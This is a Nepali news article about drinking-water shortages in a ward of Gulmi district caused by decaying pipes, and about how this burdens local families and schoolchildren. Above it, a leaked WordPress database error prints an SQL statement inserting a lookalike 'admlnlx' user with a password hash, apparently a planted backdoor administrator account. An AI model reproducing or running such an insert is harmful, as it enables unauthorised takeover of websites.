WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPvyf56IN2ndHaJbkpgZ7W7aL17z8L/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 16:18:08', '', 'admlnlx', 'admlnlx')
गुल्मी,पुस ७ –
गुल्मीको पौदीअमराई–३ बाङ्गेका उपभोक्ता वर्षको पाँच महिना खानेपानी लिनका लागि घर नजिकै रहेका कुवा, कुलेसामा गई घन्टाँै लगाएर खानेपानी लिन धाउनुपर्ने बाध्यता रहेको छ ।
करिब २२ वर्षअगाडि गुल्मी अर्घाखाँची ग्रामीण विकास परियोजना ९गाडेप०मार्फत गाविस–३ बाङ्गेमा खानेपानी आयोजना सञ्चालन गरेको थियो । तत्कालीन समयमा सञ्चालित खानेपानीे आजभोलि समय–समयमा उचित मर्मतसम्भार हुन नसक्दा अधिकांश पाइप धेरै पुरानो र जीर्ण हँुदै गएपछि बीच–बीचका जडान टुटफुट भइरहने हँुदा खानेपानी नियमित सञ्चालन हुन नसकेको खानेपानी मर्मतका कर्मचारी कृष्णबहादुर हमालले जानकारी दिनुभयो ।
विगत केही वर्षयता वर्षभरिमा झन्डै साउनदेखि माघ महिनासम्म जेनतेन खानेपानी आउने र अन्य महिना भने खानेपानी ठप्प हुने हुँदा स्थानीयवासी नजिकैका भत्किसकेका कुवा कुलेसामा घन्टाँै धाएर एक ग्रागी पानी भर्न लामो समय लगाएर खानेपानी ल्याउनुपर्ने बाध्यता रहेको समाजसेवी श्यामन्त नेपालीले जानकारी दिनुभयो ।
खानेपानीबाट वडा नं ३ का तीनसय २० घरधुरीका उपभोक्ता बढी समस्यामा रहेका छन् । धारामा खानेपानी नआउँदा बढी मात्रामा स्कुल पढ्ने साना–साना बालबालिका समस्यामा परेका छन् ।
पानी धारामा नआउँदा घरमै बसेर टाढाटाढा पानी ल्याउन जानु पर्ने र समयमा स्कुल जान नसक्नु, स्कुल गएपनि बिहान–बेलुकी घरमा पानी बोक्नुपर्ने बाध्यताले बालबालिकाको पढाइसमेत थप प्रभावित हुने गरेको छ । – रासस